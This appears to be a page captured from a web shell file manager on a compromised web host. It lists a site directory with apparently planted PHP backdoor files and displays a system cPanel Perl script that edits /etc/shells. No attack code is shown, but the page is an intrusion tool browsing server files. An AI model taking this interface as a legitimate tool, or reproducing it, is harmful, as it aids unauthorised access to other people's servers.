🎋 Bamboo Panda Manager 🇨🇳
📍 [ /home/topdeal/public_html/public ]
T Name Size Actions
📁 .. -
📁 assets -
📁 css -
📁 images -
📁 js -
📁 storage -
📁 vendor -
📄 .htaccess 1.52 KB
📄 0.php 57.54 KB
📄 OlgaliG 153.00 B
📄 atomlib.php 21.16 KB
📄 error_log 958.00 B
📄 gyfvzn.php.php 413.00 B
📄 index.php 6.76 KB
📄 main.php 1.67 KB
📄 mewidu.php.php 413.00 B
📄 mix-manifest.json 311.00 B
📄 noktsf.php.php 413.00 B
📄 robots.txt 448.00 B
📄 sunday.php 28.00 B
📄 web.config 1.17 KB
📄 wonderful.gz 2.69 KB
📄 wonderful.php 157.00 B
📄 wp-freedom.php 52.43 KB
📄 zzz.zip 1.87 KB
Το Μικρό Νάγκετ

Your IP : 104.23.243.180


Current Path : /scripts/
Upload Files:
Current File: //scripts/checkbashshell

#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/checkbashshell                  Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# [email protected]                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

use strict;

my @shells = (
    '/usr/local/cpanel/bin/jailshell',
    '/usr/local/cpanel/bin/noshell',
    '/bin/bash',
    '/bin/false',
    '/bin/ftpsh',
);

my $contents = slurp_shells();

foreach my $shell (@shells) {
    if ( $contents !~ m/$shell/ ) {
        $contents .= "$shell\n";
    }
}

write_shells($contents);

exit;

sub slurp_shells {
    open( my $shells_fh, '<', '/etc/shells' ) or die "Couldn't open /etc/shells for reading: $!";
    local $/;
    my $contents = <$shells_fh>;
    $contents .= "\n" unless $contents =~ m/\n$/;
    return $contents;
}

sub write_shells {
    my ($contents) = @_;
    open( my $shells_fh, '>', '/etc/shells' ) or die "Couldn't open /etc/shells for writing: $!";
    print {$shells_fh} $contents;
    close $shells_fh or die "Couldn't write /etc/shells. Please verify its contents! $!";
}

Access denied.